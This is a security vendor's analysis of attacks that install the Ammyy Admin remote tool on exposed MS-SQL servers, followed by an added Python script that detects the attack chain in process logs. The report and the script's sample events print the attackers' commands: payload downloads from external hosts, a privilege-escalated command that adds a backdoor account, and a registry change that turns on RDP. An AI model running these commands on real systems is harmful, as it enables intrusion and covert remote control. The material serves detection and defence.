Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin
AhnLab SEcurity intelligence Center (ASEC) recently identified attacks in which Ammyy Admin was installed on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool in the same category as AnyDesk, ToDesk and TeamViewer.
When used as intended, these tools let companies and individuals manage and control systems remotely. However, the remote control capability they provide is functionally the same as what backdoors and RAT malware offer, so threat actors abuse these legitimate tools for malicious purposes; the resulting traffic and binaries are signed, familiar and easy to overlook. AnyDesk in particular is commonly abused in attacks targeting MS-SQL servers, and ASEC has previously published a post on a case where GotoHTTP was abused in the same way.[2]
On Windows systems, MS-SQL servers are a prime target. Threat actors scan for poorly managed and vulnerable MS-SQL servers and, once they gain control, install malware. The system in this case was exposed to the Internet and is believed to have been using weak account credentials. After gaining access, the threat actor ran the following commands to collect information about the infected system (current user, local accounts, network connections and CPU model):
> whoami
> net1 user
> netstat -an
> wmic cpu get name,NumberOfCores

Figure 1. Command execution logs
The threat actor then dropped a copy of wget (get.exe) into the user's Libraries folder and used it to download additional malware. The downloaded files were Ammyy Admin (saved as mscorsvw.exe, a name borrowed from the legitimate .NET optimization service), the Ammyy Admin settings file (settings3.bin) and the PetitPotato privilege escalation tool (p.ax). Note that the log shows three successive downloads from two different hosts all written to the same mscorsvw.exe path, each overwriting the previous one:
> %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\mscorsvw.exe hxxp://110.45.186[.]8/aa_v3_protected.exe
> %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\mscorsvw.exe hxxp://110.45.186[.]8/mscorsvw.log
> %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\mscorsvw.exe hxxp://1.220.228[.]82/mscorsvw1.log
> %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\settings3.bin hxxp://1.220.228[.]82/settings3.bin
> %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\p.ax hxxp://110.45.186[.]8/p.log
Like other remote control tools, Ammyy Admin provides remote screen control. Once it is running on an infected system, anyone who knows that system's Ammyy "Client ID" and "Password" can control it remotely from their own Ammyy Admin client.

Figure 2. Remote control using Ammyy Admin
The Ammyy Admin build used in the attack is v3.10, an old version, and ways of abusing it are already public. First, Ammyy Admin can be configured so that a specific, fixed password is accepted for logins on every computer that uses that configuration. When the settings3.bin file prepared by the threat actor is placed on the infected system as its Ammyy Admin settings file, the password is therefore already known to the attacker, and only the Client ID is needed to take control of the system. The publicly known technique for obtaining the Client ID is to extract it from the memory of the running Ammyy Admin process. The specific method this threat actor used to learn the Client ID has not been identified.

Figure 3. Ammyy Admin setup file distributed by the threat actor
The threat actor also prepared a second, independent remote access path over RDP. To do this, they used the privilege escalation tool PetitPotato to add a new local user, and then enabled the Remote Desktop service by setting fDenyTSConnections to 0. Tools in the Potato family, which PetitPotato belongs to, typically rely on SeImpersonatePrivilege, a right that service accounts such as the MS-SQL service account commonly hold, to run a supplied command with SYSTEM privileges; here the supplied command is the "net1 user ... /ad" shown below. A change to fDenyTSConnections on a database server that does not normally accept RDP is a strong, low-noise indicator and is worth alerting on in its own right.
> %USERPROFILE%\Libraries\p.ax 0 "net1 user a 12[REMOVED]C!@# /ad"
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
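The chain described above (reconnaissance from the SQL Server process, wget downloads into a user's Libraries folder, a renamed mscorsvw.exe outside the .NET directory, a user-add command wrapped by a Potato-style tool, and the fDenyTSConnections change) can be hunted for in process creation logs. The following Python script is an added example and is not code from ASEC or from the write-up; the event format, host names, paths, the svc_sql account, the 203.0.113.10 download host and the rule weights are all constructed for illustration.

```python
"""Score Sysmon-style process creation events for the MS-SQL -> Ammyy Admin chain.

Added example, not from the ASEC write-up. Events are dicts with the keys
host, parent, image and cmdline; the sample events below are constructed.
"""
import re

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
LIB = r"C:\Users\svc_sql\Libraries"  # assumed user profile; the article's path is redacted

# Constructed sample events: the attack chain on db01, benign look-alikes on app02.
SAMPLE_EVENTS = [
    {"host": "db01", "parent": SQLSERVR, "image": CMD, "cmdline": "cmd.exe /c whoami"},
    {"host": "db01", "parent": SQLSERVR, "image": CMD, "cmdline": "cmd.exe /c net1 user"},
    {"host": "db01", "parent": SQLSERVR, "image": CMD, "cmdline": "cmd.exe /c netstat -an"},
    {"host": "db01", "parent": SQLSERVR, "image": CMD, "cmdline": "cmd.exe /c wmic cpu get name,NumberOfCores"},
    {"host": "db01", "parent": CMD, "image": LIB + r"\get.exe",
     "cmdline": LIB + r"\get.exe -O " + LIB + r"\mscorsvw.exe http://203.0.113.10/aa_v3_protected.exe"},
    {"host": "db01", "parent": CMD, "image": LIB + r"\mscorsvw.exe", "cmdline": LIB + r"\mscorsvw.exe"},
    {"host": "db01", "parent": CMD, "image": LIB + r"\p.ax",
     "cmdline": LIB + r'\p.ax 0 "net1 user a Passw0rd!@# /ad"'},
    {"host": "db01", "parent": CMD, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" '
                r'/v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    # The real .NET optimisation service and an administrator's netstat: must not be flagged.
    {"host": "app02", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"},
    {"host": "app02", "parent": CMD, "image": r"C:\Windows\System32\NETSTAT.EXE", "cmdline": "netstat -an"},
]

# Bare recon commands as seen in the article; "net user" only when it has no further arguments.
RE_RECON = re.compile(r"\b(?:whoami\b|netstat\s+-an\b|wmic\s+cpu\s+get\b|net1?\s+user\s*$)", re.I)
# wget-style download to an explicit output path (case-sensitive so -O is not confused with -o).
RE_WGET = re.compile(r"\bw?get\.exe\b.*\s-O\s+\S+\s+https?://")
# A local account being added, and the same command passed quoted as an argument to another binary,
# which is how Potato-style tools take the command they run with elevated privileges.
RE_USER_ADD = re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add?\b", re.I)
RE_WRAPPED_USER_ADD = re.compile(r'"net1?\s+user\s+\S+\s+\S+\s+/add?"', re.I)
# RDP being switched on through the registry.
RE_RDP_ENABLE = re.compile(r"fDenyTSConnections\b.*?/d\s+0\b", re.I)


def _is_sqlservr_child(e):
    return e["parent"].lower().endswith("\\sqlservr.exe")


def _is_masqueraded_mscorsvw(e):
    # The genuine binary lives under C:\Windows\Microsoft.NET\; anywhere else it is a rename.
    img = e["image"].lower()
    return img.endswith("\\mscorsvw.exe") and not img.startswith("c:\\windows\\microsoft.net\\")


# (rule name, weight, predicate). Weights are illustrative, counted once per host per rule.
RULES = [
    ("sqlservr_child", 2, _is_sqlservr_child),
    ("recon_cmd", 1, lambda e: bool(RE_RECON.search(e["cmdline"]))),
    ("wget_download", 3, lambda e: bool(RE_WGET.search(e["cmdline"]))),
    ("mscorsvw_masquerade", 4, _is_masqueraded_mscorsvw),
    ("user_add", 2, lambda e: bool(RE_USER_ADD.search(e["cmdline"]))),
    ("wrapped_user_add", 3, lambda e: bool(RE_WRAPPED_USER_ADD.search(e["cmdline"]))),
    ("rdp_enable", 4, lambda e: bool(RE_RDP_ENABLE.search(e["cmdline"]))),
]


def evaluate(events):
    """Return {host: {"score": int, "rules": {rule: hit_count}}} for all events."""
    results = {}
    for e in events:
        host = results.setdefault(e["host"], {"score": 0, "rules": {}})
        for name, weight, pred in RULES:
            if pred(e):
                if name not in host["rules"]:
                    host["score"] += weight  # a rule contributes its weight once per host
                host["rules"][name] = host["rules"].get(name, 0) + 1
    return results


def flag_hosts(events, threshold=8):
    """Hosts whose combined distinct-rule score reaches the threshold, sorted by name."""
    return sorted(h for h, r in evaluate(events).items() if r["score"] >= threshold)


if __name__ == "__main__":
    for host, r in evaluate(SAMPLE_EVENTS).items():
        print(host, r["score"], r["rules"])
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

Scoring distinct rules per host rather than summing every hit keeps a chatty but benign host (one administrator running netstat many times) from accumulating a high score, while the full chain on db01 trips several independent rules at once. The mscorsvw_masquerade and rdp_enable rules are precise enough to alert on individually; the recon rule is noisy on its own and is only meaningful in combination with a sqlservr.exe parent.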
The main attacks on MS-SQL servers are brute force and dictionary attacks against systems whose account credentials are poorly managed. Administrators must use passwords that are difficult to guess and change them regularly to protect their database servers from these attacks.
Users should also keep AhnLab V3 updated to the latest version to prevent malware infection. Database servers that are reachable from the Internet should additionally be placed behind a firewall or other access control so that external threat actors cannot reach the MS-SQL service at all. If these measures are not taken, the threat actor and their malware can keep re-infecting the system even after a clean-up.